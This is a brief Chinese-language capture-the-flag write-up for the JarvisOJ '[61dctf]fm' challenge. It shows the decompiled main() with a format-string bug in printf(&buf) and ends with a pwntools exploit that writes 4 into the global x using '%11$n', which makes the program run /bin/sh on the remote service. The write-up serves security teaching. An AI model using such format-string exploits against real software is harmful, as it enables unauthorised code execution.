[61dctf]fm

[61dctf]fm

附件地址 : https://dn.jarvisoj.com/challengefiles/fm.eaef2247796c11db798a579396482399

nc pwn2.jarvisoj.com 9895

checksec Canary found栈溢出行不通

main函数

在if判断了x的值，但是x的值是我们不可控制的，printf输出了&buf的值，这里是可以进行格式化字符串攻击的，而且if判断的是4 而$n可以输出4的int值到任意的地址中。

int __cdecl main(int argc, const char **argv, const char **envp)
{
    
  char buf; // [esp+2Ch] [ebp-5Ch]
  unsigned int v5; // [esp+7Ch] [ebp-Ch]

  v5 = __readgsdword(0x14u);
  be_nice_to_people();
  memset(&buf, 0, 0x50u);
  read(0, &buf, 0x50u);
  printf(&buf);
  printf("%d!\n", x);
  if ( x == 4 )
  {
    
    puts("running sh...");
    system("/bin/sh");
  }
  return 0;
}

可以看到输出aaaa的偏移量的11

通过动态调试，把x的值设置为0x4，运行后确实得到shell

exp

from pwn import *


io = process("./stack")
io = remote("pwn2.jarvisoj.com", 9895)
x_addr = 0x0804A02C
context(log_level="debug", arch="i386")

payload = flat([x_addr,'%11$n'])



io.sendline(payload)
io.interactive()